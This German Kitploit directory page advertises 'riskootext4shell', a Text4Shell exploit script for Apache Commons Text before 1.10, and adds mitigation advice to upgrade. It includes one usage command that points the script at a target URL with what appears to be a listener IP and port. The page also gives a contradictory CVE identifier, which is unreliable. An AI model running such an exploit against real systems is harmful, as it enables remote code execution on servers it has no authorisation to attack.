Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
riskootext4shell — Text4shell-Skript für Text Commons <=1.10 CVE-2022-33980 | Kitploit
Tools/GitHubGitHub/joseluisinigo/riskootext4shell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubjoseluisinigo/riskootext4shell

riskootext4shell

Text4shell-Skript für Text Commons <=1.10 CVE-2022-33980

Repository anzeigen
11vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

riskootext4shell

text4shell script for text coomons < =1.10 CVE-2022-33980

  • Die Bibliothek Apache Commons Text ist eine alternative Bibliothek zu den nativen Funktionen des Java JDK.
  • Versionen vor Version 1.10.0 von Apache Commons
  • Ähnlich wie CVE-2022-33980
root@kitploit:~
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22

Minderung

Die Hauptlösung besteht darin, die Komponente Apache Commons Text dringend auf die verfügbaren Versionen zu aktualisieren, die diese Sicherheitslücke beheben. Konkret sollte auf eine Version 1.10.0 oder höher von Apache Commons Text aktualisiert werden.

In diesem Update wurde beschlossen, diese problematischen Ersetzungen standardmäßig zu deaktivieren. In der Changelog-Datei der Bibliothek ist die folgende Änderung enthalten:

Make default string lookups configurable vía system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled vía system property. See StringLookupFactory for details.

Apache hat eine Mitteilung mit offiziellen Informationen und einem Verweis auf das Update veröffentlicht, das das Problem behebt.

Tool herunterladen